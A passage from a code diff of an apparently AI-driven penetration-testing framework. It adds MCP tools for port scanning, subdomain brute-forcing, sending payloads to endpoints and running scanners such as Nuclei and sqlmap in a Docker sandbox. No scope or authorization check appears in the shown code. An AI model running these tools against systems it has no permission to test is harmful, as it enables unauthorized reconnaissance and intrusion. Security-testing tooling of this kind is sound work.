+                        "headers": dict(resp.headers),
+                        "body": body[:5000],
+                        "body_length": len(body),
+                    }
+    except Exception as e:
+        return {"error": str(e)}
+
+
+async def _dns_lookup(domain: str, record_type: str = "A") -> Dict:
+    """Perform DNS lookups for a domain."""
+    import subprocess
+
+    try:
+        result = subprocess.run(
+            ["dig", "+short", domain, record_type],
+            capture_output=True, text=True, timeout=10
+        )
+        records = [r.strip() for r in result.stdout.strip().split("\n") if r.strip()]
+        return {"domain": domain, "type": record_type, "records": records}
+    except FileNotFoundError:
+        # Fallback to socket for A records
+        if record_type.upper() == "A":
+            try:
+                ips = socket.getaddrinfo(domain, None, socket.AF_INET)
+                records = list(set(ip[4][0] for ip in ips))
+                return {"domain": domain, "type": "A", "records": records}
+            except socket.gaierror as e:
+                return {"domain": domain, "type": "A", "error": str(e)}
+        return {"error": "dig command not available and only A records supported via fallback"}
+    except Exception as e:
+        return {"error": str(e)}
+
+
+async def _port_scan(host: str, ports: str = "80,443,8080,8443,3000,5000") -> Dict:
+    """Scan TCP ports on a host."""
+    port_list = [int(p.strip()) for p in ports.split(",") if p.strip().isdigit()]
+    results = {}
+
+    async def check_port(port: int):
+        try:
+            reader, writer = await asyncio.wait_for(
+                asyncio.open_connection(host, port), timeout=3
+            )
+            writer.close()
+            await writer.wait_closed()
+            return port, "open"
+        except (asyncio.TimeoutError, ConnectionRefusedError, OSError):
+            return port, "closed"
+
+    tasks = [check_port(p) for p in port_list[:100]]
+    for coro in asyncio.as_completed(tasks):
+        port, state = await coro
+        results[str(port)] = state
+
+    open_ports = [p for p, s in results.items() if s == "open"]
+    return {"host": host, "ports": results, "open_ports": open_ports}
+
+
+async def _technology_detect(url: str) -> Dict:
+    """Detect technologies from HTTP response headers."""
+    import aiohttp
+
+    try:
+        async with aiohttp.ClientSession() as session:
+            async with session.get(url, timeout=10, allow_redirects=True) as resp:
+                headers = dict(resp.headers)
+                body = await resp.text()
+
+                techs = []
+                server = headers.get("Server", "")
+                if server:
+                    techs.append(f"Server: {server}")
+
+                powered_by = headers.get("X-Powered-By", "")
+                if powered_by:
+                    techs.append(f"X-Powered-By: {powered_by}")
+
+                # Framework detection from body
+                framework_markers = {
+                    "React": ["react", "_next/static", "__NEXT_DATA__"],
+                    "Vue.js": ["vue.js", "__vue__", "v-cloak"],
+                    "Angular": ["ng-version", "angular"],
+                    "jQuery": ["jquery"],
+                    "WordPress": ["wp-content", "wp-includes"],
+                    "Laravel": ["laravel_session", "csrf-token"],
+                    "Django": ["csrfmiddlewaretoken", "django"],
+                    "Rails": ["csrf-param", "action_dispatch"],
+                    "Spring": ["jsessionid"],
+                    "Express": ["connect.sid"],
+                }
+
+                body_lower = body.lower()
+                for tech, markers in framework_markers.items():
+                    if any(m.lower() in body_lower for m in markers):
+                        techs.append(tech)
+
+                return {"url": url, "technologies": techs, "headers": {
+                    k: v for k, v in headers.items()
+                    if k.lower() in ("server", "x-powered-by", "x-aspnet-version",
+                                     "x-generator", "x-drupal-cache", "x-framework")
+                }}
+    except Exception as e:
+        return {"error": str(e)}
+
+
+async def _subdomain_enumerate(domain: str) -> Dict:
+    """Enumerate subdomains via common prefixes."""
+    prefixes = [
+        "www", "api", "admin", "app", "dev", "staging", "test", "mail",
+        "ftp", "cdn", "blog", "shop", "docs", "status", "dashboard",
+        "portal", "m", "mobile", "beta", "demo", "v2", "internal",
+    ]
+
+    found = []
+
+    async def check_subdomain(prefix: str):
+        subdomain = f"{prefix}.{domain}"
+        try:
+            socket.getaddrinfo(subdomain, None, socket.AF_INET)
+            return subdomain
+        except socket.gaierror:
+            return None
+
+    tasks = [check_subdomain(p) for p in prefixes]
+    results = await asyncio.gather(*tasks)
+    found = [r for r in results if r]
+
+    return {"domain": domain, "subdomains": found, "count": len(found)}
+
+
+async def _save_finding(finding_json: str) -> Dict:
+    """Persist a finding (JSON string). Returns confirmation."""
+    try:
+        finding = json.loads(finding_json)
+        # Validate required fields
+        required = ["title", "severity", "vulnerability_type", "affected_endpoint"]
+        missing = [f for f in required if f not in finding]
+        if missing:
+            return {"error": f"Missing required fields: {missing}"}
+        return {"status": "saved", "finding_id": finding.get("id", "unknown"), "title": finding["title"]}
+    except json.JSONDecodeError as e:
+        return {"error": f"Invalid JSON: {e}"}
+
+
+async def _get_vuln_prompt(vuln_type: str, target: str = "", endpoint: str = "", param: str = "", tech: str = "") -> Dict:
+    """Retrieve the AI decision prompt for a vulnerability type."""
+    if not HAS_AI_PROMPTS:
+        return {"error": "AI prompts module not available"}
+
+    try:
+        prompt_data = get_prompt(vuln_type, {
+            "TARGET_URL": target,
+            "ENDPOINT": endpoint,
+            "PARAMETER": param,
+            "TECHNOLOGY": tech,
+        })
+        if not prompt_data:
+            return {"error": f"No prompt found for vuln type: {vuln_type}"}
+        full_prompt = build_testing_prompt(vuln_type, target, endpoint, param, tech)
+        return {"vuln_type": vuln_type, "prompt": prompt_data, "full_prompt": full_prompt}
+    except Exception as e:
+        return {"error": str(e)}
+
+
+# ---------------------------------------------------------------------------
+# Sandbox tool implementations (Docker-based real tools)
+# ---------------------------------------------------------------------------
+
+async def _execute_nuclei(
+    target: str,
+    templates: Optional[str] = None,
+    severity: Optional[str] = None,
+    tags: Optional[str] = None,
+    rate_limit: int = 150,
+) -> Dict:
+    """Run Nuclei vulnerability scanner in the Docker sandbox."""
+    if not HAS_SANDBOX:
+        return {"error": "Sandbox module not available. Install docker SDK: pip install docker"}
+
+    try:
+        sandbox = await get_sandbox()
+        if not sandbox.is_available:
+            return {"error": "Sandbox container not running. Build with: cd docker && docker compose -f docker-compose.sandbox.yml up -d"}
+
+        result = await sandbox.run_nuclei(
+            target=target,
+            templates=templates,
+            severity=severity,
+            tags=tags,
+            rate_limit=rate_limit,
+        )
+
+        return {
+            "tool": "nuclei",
+            "target": target,
+            "exit_code": result.exit_code,
+            "findings": result.findings,
+            "findings_count": len(result.findings),
+            "duration_seconds": result.duration_seconds,
+            "raw_output": result.stdout[:3000] if result.stdout else "",
+            "error": result.error,
+        }
+    except Exception as e:
+        return {"error": str(e)}
+
+
+async def _execute_naabu(
+    target: str,
+    ports: Optional[str] = None,
+    top_ports: Optional[int] = None,
+    rate: int = 1000,
+) -> Dict:
+    """Run Naabu port scanner in the Docker sandbox."""
+    if not HAS_SANDBOX:
+        return {"error": "Sandbox module not available"}
+
+    try:
+        sandbox = await get_sandbox()
+        if not sandbox.is_available:
+            return {"error": "Sandbox container not running"}
+
+        result = await sandbox.run_naabu(
+            target=target,
+            ports=ports,
+            top_ports=top_ports,
+            rate=rate,
+        )
+
+        open_ports = [f["port"] for f in result.findings]
+        return {
+            "tool": "naabu",
+            "target": target,
+            "exit_code": result.exit_code,
+            "open_ports": sorted(open_ports),
+            "port_count": len(open_ports),
+            "findings": result.findings,
+            "duration_seconds": result.duration_seconds,
+            "error": result.error,
+        }
+    except Exception as e:
+        return {"error": str(e)}
+
+
+async def _sandbox_health() -> Dict:
+    """Check sandbox container health and available tools."""
+    if not HAS_SANDBOX:
+        return {"status": "unavailable", "reason": "Sandbox module not installed"}
+
+    try:
+        sandbox = await get_sandbox()
+        return await sandbox.health_check()
+    except Exception as e:
+        return {"status": "error", "reason": str(e)}
+
+
+async def _sandbox_exec(tool: str, args: str, timeout: int = 300) -> Dict:
+    """Execute any allowed tool in the Docker sandbox."""
+    if not HAS_SANDBOX:
+        return {"error": "Sandbox module not available"}
+
+    try:
+        sandbox = await get_sandbox()
+        if not sandbox.is_available:
+            return {"error": "Sandbox container not running"}
+
+        result = await sandbox.run_tool(tool=tool, args=args, timeout=timeout)
+
+        return {
+            "tool": tool,
+            "exit_code": result.exit_code,
+            "stdout": result.stdout[:5000] if result.stdout else "",
+            "stderr": result.stderr[:2000] if result.stderr else "",
+            "duration_seconds": result.duration_seconds,
+            "error": result.error,
+        }
+    except Exception as e:
+        return {"error": str(e)}
+
+
+# ---------------------------------------------------------------------------
+# MCP Server Definition
+# ---------------------------------------------------------------------------
+
+TOOLS = [
+    {
+        "name": "screenshot_capture",
+        "description": "Capture a browser screenshot of a URL using Playwright",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "url": {"type": "string", "description": "URL to screenshot"},
+                "selector": {"type": "string", "description": "Optional CSS selector to capture"},
+            },
+            "required": ["url"],
+        },
+    },
+    {
+        "name": "payload_delivery",
+        "description": "Send an HTTP request with a payload and capture the full response",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "endpoint": {"type": "string", "description": "Target URL"},
+                "method": {"type": "string", "description": "HTTP method", "default": "GET"},
+                "payload": {"type": "string", "description": "Payload value"},
+                "content_type": {"type": "string", "default": "application/x-www-form-urlencoded"},
+                "param": {"type": "string", "description": "Parameter name", "default": "q"},
+            },
+            "required": ["endpoint", "payload"],
+        },
+    },
+    {
+        "name": "dns_lookup",
+        "description": "Perform DNS lookups for a domain",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "domain": {"type": "string", "description": "Domain to look up"},
+                "record_type": {"type": "string", "default": "A", "description": "DNS record type"},
+            },
+            "required": ["domain"],
+        },
+    },
+    {
+        "name": "port_scan",
+        "description": "Scan TCP ports on a host",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "host": {"type": "string", "description": "Target host"},
+                "ports": {"type": "string", "default": "80,443,8080,8443,3000,5000", "description": "Comma-separated ports"},
+            },
+            "required": ["host"],
+        },
+    },
+    {
+        "name": "technology_detect",
+        "description": "Detect technologies from HTTP response headers and body",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "url": {"type": "string", "description": "URL to analyze"},
+            },
+            "required": ["url"],
+        },
+    },
+    {
+        "name": "subdomain_enumerate",
+        "description": "Enumerate subdomains via common prefix brute-force",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "domain": {"type": "string", "description": "Base domain to enumerate"},
+            },
+            "required": ["domain"],
+        },
+    },
+    {
+        "name": "save_finding",
+        "description": "Persist a vulnerability finding (JSON string)",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "finding_json": {"type": "string", "description": "Finding as JSON string"},
+            },
+            "required": ["finding_json"],
+        },
+    },
+    {
+        "name": "get_vuln_prompt",
+        "description": "Retrieve the AI decision prompt for a vulnerability type",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "vuln_type": {"type": "string", "description": "Vulnerability type key"},
+                "target": {"type": "string", "description": "Target URL"},
+                "endpoint": {"type": "string", "description": "Specific endpoint"},
+                "param": {"type": "string", "description": "Parameter name"},
+                "tech": {"type": "string", "description": "Detected technology"},
+            },
+            "required": ["vuln_type"],
+        },
+    },
+    # --- Sandbox tools (Docker-based real security tools) ---
+    {
+        "name": "execute_nuclei",
+        "description": "Run Nuclei vulnerability scanner (8000+ templates) in Docker sandbox. Returns structured findings with severity, CVE, CWE.",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "target": {"type": "string", "description": "Target URL to scan"},
+                "templates": {"type": "string", "description": "Specific template path (e.g. 'cves/2024/', 'vulnerabilities/xss/')"},
+                "severity": {"type": "string", "description": "Filter: critical,high,medium,low,info"},
+                "tags": {"type": "string", "description": "Filter by tags: xss,sqli,lfi,ssrf,rce"},
+                "rate_limit": {"type": "integer", "description": "Requests per second (default 150)", "default": 150},
+            },
+            "required": ["target"],
+        },
+    },
+    {
+        "name": "execute_naabu",
+        "description": "Run Naabu port scanner in Docker sandbox. Fast SYN-based scanning with configurable port ranges.",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "target": {"type": "string", "description": "IP address or hostname to scan"},
+                "ports": {"type": "string", "description": "Ports to scan (e.g. '80,443,8080' or '1-65535')"},
+                "top_ports": {"type": "integer", "description": "Scan top N ports (e.g. 100, 1000)"},
+                "rate": {"type": "integer", "description": "Packets per second (default 1000)", "default": 1000},
+            },
+            "required": ["target"],
+        },
+    },
+    {
+        "name": "sandbox_health",
+        "description": "Check Docker sandbox status and available security tools",
+        "inputSchema": {
+            "type": "object",
+            "properties": {},
+        },
+    },
+    {
+        "name": "sandbox_exec",
+        "description": "Execute any allowed security tool in the Docker sandbox (nuclei, naabu, nmap, httpx, subfinder, katana, ffuf, sqlmap, nikto, etc.)",
+        "inputSchema": {
+            "type": "object",
+            "properties": {
+                "tool": {"type": "string", "description": "Tool name (e.g. nuclei, naabu, nmap, httpx, subfinder, katana, ffuf, gobuster, dalfox, nikto, sqlmap, curl)"},
+                "args": {"type": "string", "description": "Command-line arguments for the tool"},
+                "timeout": {"type": "integer", "description": "Max execution time in seconds (default 300)", "default": 300},
+            },
+            "required": ["tool", "args"],
+        },
+    },
+]
+
+# Tool dispatcher
+TOOL_HANDLERS = {
+    "screenshot_capture": lambda args: _screenshot_capture(args["url"], args.get("selector")),
+    "payload_delivery": lambda args: _payload_delivery(
+        args["endpoint"], args.get("method", "GET"), args.get("payload", ""),
+        args.get("content_type", "application/x-www-form-urlencoded"),
+        args.get("headers"), args.get("param", "q")
+    ),
+    "dns_lookup": lambda args: _dns_lookup(args["domain"], args.get("record_type", "A")),
+    "port_scan": lambda args: _port_scan(args["host"], args.get("ports", "80,443,8080,8443,3000,5000")),
+    "technology_detect": lambda args: _technology_detect(args["url"]),
+    "subdomain_enumerate": lambda args: _subdomain_enumerate(args["domain"]),
+    "save_finding": lambda args: _save_finding(args["finding_json"]),
+    "get_vuln_prompt": lambda args: _get_vuln_prompt(
+        args["vuln_type"], args.get("target", ""), args.get("endpoint", ""),
+        args.get("param", ""), args.get("tech", "")
+    ),
+    # Sandbox tools
+    "execute_nuclei": lambda args: _execute_nuclei(
+        args["target"], args.get("templates"), args.get("severity"),
+        args.get("tags"), args.get("rate_limit", 150)
+    ),
+    "execute_naabu": lambda args: _execute_naabu(
+        args["target"], args.get("ports"), args.get("top_ports"),
+        args.get("rate", 1000)
+    ),
+    "sandbox_health": lambda args: _sandbox_health(),
+    "sandbox_exec": lambda args: _sandbox_exec(
+        args["tool"], args["args"], args.get("timeout", 300)
+    ),
+}
+
+
+def create_mcp_server() -> "Server":
+    """Create and configure the MCP server with all pentest tools."""
+    if not HAS_MCP:
+        raise RuntimeError("MCP package not installed. Install with: pip install 'mcp>=1.0.0'")
+
+    server = Server("neurosploit-tools")
+
+    @server.list_tools()
+    async def list_tools() -> list:
+        return [Tool(**t) for t in TOOLS]
+
+    @server.call_tool()
+    async def call_tool(name: str, arguments: dict) -> list:
+        handler = TOOL_HANDLERS.get(name)
+        if not handler:
+            return [TextContent(type="text", text=json.dumps({"error": f"Unknown tool: {name}"}))]
+
+        try:
+            result = await handler(arguments)
+            return [TextContent(type="text", text=json.dumps(result, default=str))]
+        except Exception as e:
+            return [TextContent(type="text", text=json.dumps({"error": str(e)}))]
+
+    return server
+
+
+async def main():
+    """Run the MCP server via stdio transport."""
+    server = create_mcp_server()
+
+    transport = os.getenv("MCP_TRANSPORT", "stdio")
+    if transport == "stdio":
+        async with stdio_server() as (read_stream, write_stream):
+            await server.run(read_stream, write_stream, server.create_initialization_options())
+    else:
+        logger.error(f"Unsupported transport: {transport}. Use 'stdio'.")
+
+
+if __name__ == "__main__":
+    asyncio.run(main())
diff --git a/core/model_router.py b/core/model_router.py
new file mode 100644
index 0000000..54deb62
--- /dev/null
+++ b/core/model_router.py
@@ -0,0 +1,81 @@
+#!/usr/bin/env python3
+"""
+Model Router - Task-type-based LLM routing.
+
+Routes requests to different LLM profiles based on task type:
+- reasoning: Complex logic and decision-making
+- analysis: Data analysis and pattern recognition
+- generation: Content and payload generation
+- validation: Result verification and confirmation
+
+Enabled/disabled via config. When disabled, callers fall back to their default provider.
+"""
+
+import os
+import logging
+from typing import Dict, Optional, Callable
+
+logger = logging.getLogger(__name__)
+
+
+class ModelRouter:
+    """Routes LLM requests to different profiles based on task type."""
+
+    def __init__(self, config: Dict, llm_manager_factory: Callable):
+        """
+        Args:
+            config: Full application config dict (must contain 'model_routing' and 'llm' keys)
+            llm_manager_factory: Callable that takes a profile name and returns an LLMManager instance
+        """
+        routing_config = config.get('model_routing', {})
+        self.enabled = routing_config.get('enabled', False)
+
+        # Allow env var override
+        env_override = os.getenv('ENABLE_MODEL_ROUTING', '').strip().lower()
+        if env_override == 'true':
+            self.enabled = True
+        elif env_override == 'false':
+            self.enabled = False
+
+        self.routes = routing_config.get('routes', {})
+        self.llm_manager_factory = llm_manager_factory
+        self._managers = {}  # Cache LLMManager instances per profile
+
+        if self.enabled:
+            logger.info(f"Model routing enabled with routes: {list(self.routes.keys())}")
+        else:
+            logger.debug("Model routing disabled")
+
+    def generate(self, prompt: str, system_prompt: Optional[str] = None,
+                 task_type: str = "default") -> Optional[str]:
+        """Route a generation request to the appropriate LLM profile.
+
+        Returns None if routing is disabled or no route matches,
+        allowing callers to fall back to their default provider.
+        """
+        if not self.enabled:
+            return None
+
+        profile = self.routes.get(task_type, self.routes.get('default'))
+        if not profile:
+            logger.debug(f"No route for task_type '{task_type}', falling back to default")
+            return None
+
+        try:
+            if profile not in self._managers:
+                self._managers[profile] = self.llm_manager_factory(profile)
+
+            manager = self._managers[profile]
+            logger.debug(f"Routing task_type '{task_type}' to profile '{profile}' "
+                         f"(provider: {manager.provider}, model: {manager.model})")
+            return manager.generate(prompt, system_prompt)
+
+        except Exception as e:
+            logger.error(f"Model routing error for profile '{profile}': {e}")
+            return None
+
+    def get_profile_for_task(self, task_type: str) -> Optional[str]:
+        """Get the profile name that would handle a given task type."""
+        if not self.enabled:
+            return None
+        return self.routes.get(task_type, self.routes.get('default'))
diff --git a/core/report_generator.py b/core/report_generator.py
index 4c2c3c1..e2dcc88 100644
--- a/core/report_generator.py
+++ b/core/report_generator.py
@@ -4,9 +4,11 @@ Professional Pentest Report Generator
 Generates detailed reports with PoCs, CVSS scores, requests/responses
 """
 
+import base64
 import json
 import os
 from datetime import datetime
+from pathlib import Path
 from typing import Dict, List, Any
 import html
 import logging
@@ -49,6 +51,41 @@ class ReportGenerator:
         escaped = self._escape_html(code)
         return f'<pre><code class="language-{language}">{escaped}</code></pre>'
 
+    def embed_screenshot(self, filepath: str) -> str:
+        """Convert a screenshot file to a base64 data URI for HTML embedding."""
+        path = Path(filepath)
+        if not path.exists():
+            return ""
+        try:
+            with open(path, 'rb') as f:
+                data = base64.b64encode(f.read()).decode('ascii')
+            return f"data:image/png;base64,{data}"
+        except Exception:
+            return ""
+
+    def build_screenshots_html(self, finding_id: str, screenshots_dir: str = "reports/screenshots") -> str:
+        """Build screenshot grid HTML for a finding, embedding images as base64."""
+        finding_dir = Path(screenshots_dir) / finding_id
+        if not finding_dir.exists():
+            return ""
+
+        screenshots = sorted(finding_dir.glob("*.png"))[:3]
+        if not screenshots:
+            return ""
+
+        cards = ""
+        for ss in screenshots:
+            data_uri = self.embed_screenshot(str(ss))
+            if data_uri:
+                caption = ss.stem.replace('_', ' ').title()
+                cards += f"""
+                <div class="screenshot-card">
+                    <img src="{data_uri}" alt="{caption}" />
+                    <div class="screenshot-caption">{caption}</div>
+                </div>"""
+
+        return f'<div class="screenshot-grid">{cards}</div>' if cards else ""
+
     def generate_executive_summary(self) -> str:
         """Generate executive summary section"""
         summary = self.scan_results.get("summary", {})
@@ -611,17 +648,39 @@ class ReportGenerator:
         return html
 
     def save_report(self, output_dir: str = "reports") -> str:
-        """Save HTML report to file"""
-        os.makedirs(output_dir, exist_ok=True)
+        """Save HTML report to a per-report folder with screenshots."""
+        import shutil
+
+        # Create per-report folder
+        target = self.scan_results.get("target_url", self.scan_results.get("target", "unknown"))
+        target_name = target.replace("://", "_").replace("/", "_").rstrip("_")[:40]
+        report_folder = f"report_{target_name}_{self.timestamp}"
+        report_dir = os.path.join(output_dir, report_folder)
+        os.makedirs(report_dir, exist_ok=True)
 
         filename = f"pentest_report_{self.timestamp}.html"
-        filepath = os.path.join(output_dir, filename)
+        filepath = os.path.join(report_dir, filename)
 
         html_content = self.generate_html_report()
 
         with open(filepath, 'w', encoding='utf-8') as f:
             f.write(html_content)
 
+        # Copy screenshots into report folder
+        screenshots_src = os.path.join("reports", "screenshots")
+        if os.path.exists(screenshots_src):
+            screenshots_dest = os.path.join(report_dir, "screenshots")
+            vulns = self.scan_results.get("vulnerabilities", [])
+            for vuln in vulns:
+                fid = vuln.get("id", "")
+                if fid:
+                    src_dir = os.path.join(screenshots_src, str(fid))
+                    if os.path.exists(src_dir):
+                        dest_dir = os.path.join(screenshots_dest, str(fid))
+                        os.makedirs(dest_dir, exist_ok=True)
+                        for ss_file in Path(src_dir).glob("*.png"):
+                            shutil.copy2(str(ss_file), os.path.join(dest_dir, ss_file.name))
+
         logger.info(f"Report saved to: {filepath}")
         return filepath
 
diff --git a/core/sandbox_manager.py b/core/sandbox_manager.py
new file mode 100644
index 0000000..9a66290
--- /dev/null
+++ b/core/sandbox_manager.py
@@ -0,0 +1,758 @@
+#!/usr/bin/env python3
+"""
+NeuroSploit Security Sandbox Manager
+
+Manages Docker-based security tool execution in an isolated container.
+Provides high-level API for running Nuclei, Naabu, and other tools.
+
+Architecture:
+  - Persistent sandbox container (neurosploit-sandbox) stays running
+  - Tools executed via `docker exec` for sub-second startup
+  - Output collected from container stdout + output files
+  - Resource limits enforced (2GB RAM, 2 CPU)
+  - Network isolation with controlled egress
+"""
+
+import asyncio
+import json
+import logging
+import os
+import re
+import shlex
+from abc import ABC, abstractmethod
+from typing import Dict, Any, Optional, List, Tuple
+from dataclasses import dataclass, field
+from datetime import datetime
+
+logger = logging.getLogger(__name__)
+
+# Guard Docker SDK import
+try:
+    import docker
+    from docker.errors import DockerException, NotFound, APIError
+    HAS_DOCKER = True
+except ImportError:
+    HAS_DOCKER = False
+    logger.warning("Docker SDK not installed. Install with: pip install docker")
+
+
+@dataclass
+class SandboxResult:
+    """Result from a sandboxed tool execution."""
+    tool: str
+    command: str
+    exit_code: int
+    stdout: str
+    stderr: str
+    duration_seconds: float
+    findings: List[Dict] = field(default_factory=list)
+    error: Optional[str] = None
+
+
+# ---------------------------------------------------------------------------
+# Nuclei output parser
+# ---------------------------------------------------------------------------
+def parse_nuclei_jsonl(output: str) -> List[Dict]:
+    """Parse Nuclei JSONL output into structured findings."""
+    findings = []
+    severity_map = {
+        "critical": "critical",
+        "high": "high",
+        "medium": "medium",
+        "low": "low",
+        "info": "info",
+    }
+
+    for line in output.strip().split("\n"):
+        if not line.strip():
+            continue
+        try:
+            data = json.loads(line)
+            info = data.get("info", {})
+            tags = info.get("tags", [])
+            findings.append({
+                "title": info.get("name", "Unknown"),
+                "severity": severity_map.get(info.get("severity", "info"), "info"),
+                "vulnerability_type": tags[0] if tags else "vulnerability",
+                "description": info.get("description", ""),
+                "affected_endpoint": data.get("matched-at", ""),
+                "evidence": data.get("matcher-name", ""),
+                "template_id": data.get("template-id", ""),
+                "curl_command": data.get("curl-command", ""),
+                "remediation": info.get("remediation", "Review and fix the vulnerability"),
+                "references": info.get("reference", []),
+                "cwe": info.get("classification", {}).get("cwe-id", []),
+                "cvss_score": info.get("classification", {}).get("cvss-score", 0),
+            })
+        except (json.JSONDecodeError, KeyError):
+            continue
+
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# Naabu output parser
+# ---------------------------------------------------------------------------
+def parse_naabu_output(output: str) -> List[Dict]:
+    """Parse Naabu output into structured port findings."""
+    findings = []
+    seen = set()
+
+    for line in output.strip().split("\n"):
+        line = line.strip()
+        if not line:
+            continue
+
+        # Naabu JSON mode: {"host":"x","ip":"y","port":80}
+        try:
+            data = json.loads(line)
+            host = data.get("host", data.get("ip", ""))
+            port = data.get("port", 0)
+            key = f"{host}:{port}"
+            if key not in seen:
+                seen.add(key)
+                findings.append({
+                    "host": host,
+                    "port": port,
+                    "protocol": "tcp",
+                })
+            continue
+        except (json.JSONDecodeError, KeyError):
+            pass
+
+        # Text mode: host:port
+        match = re.match(r"^(.+?):(\d+)$", line)
+        if match:
+            host, port = match.group(1), int(match.group(2))
+            key = f"{host}:{port}"
+            if key not in seen:
+                seen.add(key)
+                findings.append({
+                    "host": host,
+                    "port": port,
+                    "protocol": "tcp",
+                })
+
+    return findings
+
+
+class BaseSandbox(ABC):
+    """Abstract interface for sandbox implementations (legacy shared + per-scan Kali)."""
+
+    @abstractmethod
+    async def initialize(self) -> Tuple[bool, str]: ...
+
+    @property
+    @abstractmethod
+    def is_available(self) -> bool: ...
+
+    @abstractmethod
+    async def stop(self): ...
+
+    @abstractmethod
+    async def health_check(self) -> Dict: ...
+
+    @abstractmethod
+    async def run_nuclei(self, target, templates=None, severity=None,
+                         tags=None, rate_limit=150, timeout=600) -> "SandboxResult": ...
+
+    @abstractmethod
+    async def run_naabu(self, target, ports=None, top_ports=None,
+                        scan_type="s", rate=1000, timeout=300) -> "SandboxResult": ...
+
+    @abstractmethod
+    async def run_httpx(self, targets, timeout=120) -> "SandboxResult": ...
+
+    @abstractmethod
+    async def run_subfinder(self, domain, timeout=120) -> "SandboxResult": ...
+
+    @abstractmethod
+    async def run_nmap(self, target, ports=None, scripts=True, timeout=300) -> "SandboxResult": ...
+
+    @abstractmethod
+    async def run_tool(self, tool, args, timeout=300) -> "SandboxResult": ...
+
+    @abstractmethod
+    async def execute_raw(self, command, timeout=300) -> "SandboxResult": ...
+
+
+class SandboxManager(BaseSandbox):
+    """
+    Legacy shared sandbox: persistent Docker container running security tools.
+
+    Tools are executed via `docker exec` for fast invocation.
+    Used by MCP server and terminal API (no scan_id context).
+    """
+
+    SANDBOX_IMAGE = "neurosploit-sandbox:latest"
+    SANDBOX_CONTAINER = "neurosploit-sandbox"
+    DEFAULT_TIMEOUT = 300  # 5 minutes
+    MAX_OUTPUT = 2 * 1024 * 1024  # 2MB
+
+    # Known install commands for tools not pre-installed in the sandbox
+    KNOWN_INSTALLS = {
+        "wpscan": "gem install wpscan 2>&1",
+        "joomscan": "pip3 install joomscan 2>&1",
+        "dirsearch": "pip3 install dirsearch 2>&1",
+        "commix": "pip3 install commix 2>&1",
+        "wfuzz": "pip3 install wfuzz 2>&1",
+        "sslyze": "pip3 install sslyze 2>&1",
+        "retire": "npm install -g retire 2>&1",
+        "testssl": "apt-get update -qq && apt-get install -y -qq testssl.sh 2>&1",
+        "trufflehog": "pip3 install trufflehog 2>&1",
+        "gitleaks": "GO111MODULE=on go install github.com/gitleaks/gitleaks/v8@latest 2>&1",
+    }
+
+    def __init__(self):
+        self._client: Optional[Any] = None
+        self._container: Optional[Any] = None
+        self._available = False
+        self._temp_installed: set = set()  # Tools temporarily installed for cleanup
+
+    # ------------------------------------------------------------------
+    # Lifecycle
+    # ------------------------------------------------------------------
+
+    async def initialize(self) -> Tuple[bool, str]:
+        """Initialize Docker client and ensure sandbox is running."""
+        if not HAS_DOCKER:
+            return False, "Docker SDK not installed"
+
+        try:
+            self._client = docker.from_env()
+            self._client.ping()
+        except Exception as e:
+            return False, f"Docker not available: {e}"
+
+        # Check if sandbox container already running
+        try:
+            container = self._client.containers.get(self.SANDBOX_CONTAINER)
+            if container.status == "running":
+                self._container = container
+                self._available = True
+                return True, "Sandbox already running"
+            else:
+                container.remove(force=True)
+        except NotFound:
+            pass
+
+        # Check if image exists
+        try:
+            self._client.images.get(self.SANDBOX_IMAGE)
+        except NotFound:
+            return False, (
+                f"Sandbox image '{self.SANDBOX_IMAGE}' not found. "
+                "Build with: cd docker && docker compose -f docker-compose.sandbox.yml build"
+            )
+
+        # Start sandbox container
+        try:
+            self._container = self._client.containers.run(
+                self.SANDBOX_IMAGE,
+                command="sleep infinity",
+                name=self.SANDBOX_CONTAINER,
+                detach=True,
+                restart_policy={"Name": "unless-stopped"},
+                network_mode="bridge",
+                mem_limit="2g",
+                cpu_period=100000,
+                cpu_quota=200000,  # 2 CPUs
+                cap_add=["NET_RAW", "NET_ADMIN"],
+                security_opt=["no-new-privileges:true"],
+            )
+            self._available = True
+            return True, "Sandbox started"
+        except Exception as e:
+            return False, f"Failed to start sandbox: {e}"
+
+    @property
+    def is_available(self) -> bool:
+        """Check if sandbox is ready for tool execution."""
+        return self._available and self._container is not None
+
+    async def stop(self):
+        """Stop and remove the sandbox container."""
+        if self._container:
+            try:
+                self._container.stop(timeout=10)
+                self._container.remove(force=True)
+            except Exception:
+                pass
+            self._container = None
+            self._available = False
+
+    async def health_check(self) -> Dict:
+        """Run health check on the sandbox container."""
+        if not self.is_available:
+            return {"status": "unavailable", "tools": []}
+
+        result = await self._exec("nuclei -version 2>&1 && naabu -version 2>&1 && nmap --version 2>&1 | head -1")
+        tools = []
+        if "nuclei" in result.stdout.lower():
+            tools.append("nuclei")
+        if "naabu" in result.stdout.lower():
+            tools.append("naabu")
+        if "nmap" in result.stdout.lower():
+            tools.append("nmap")
+
+        return {
+            "status": "healthy" if tools else "degraded",
+            "tools": tools,
+            "container": self.SANDBOX_CONTAINER,
+            "uptime": self._container.attrs.get("State", {}).get("StartedAt", "") if self._container else "",
+        }
+
+    # ------------------------------------------------------------------
+    # Low-level execution
+    # ------------------------------------------------------------------
+
+    async def _exec(
+        self, command: str, timeout: int = DEFAULT_TIMEOUT
+    ) -> SandboxResult:
+        """Execute a command inside the sandbox container."""
+        if not self.is_available:
+            return SandboxResult(
+                tool="sandbox", command=command, exit_code=-1,
+                stdout="", stderr="", duration_seconds=0,
+                error="Sandbox not available",
+            )
+
+        started = datetime.utcnow()
+
+        try:
+            exec_result = await asyncio.get_event_loop().run_in_executor(
+                None,
+                lambda: self._container.exec_run(
+                    cmd=["bash", "-c", command],
+                    stdout=True,
+                    stderr=True,
+                    demux=True,
+                ),
+            )
+
+            duration = (datetime.utcnow() - started).total_seconds()
+
+            stdout_raw, stderr_raw = exec_result.output
+            stdout = (stdout_raw or b"").decode("utf-8", errors="replace")
+            stderr = (stderr_raw or b"").decode("utf-8", errors="replace")
+
+            # Truncate oversized output
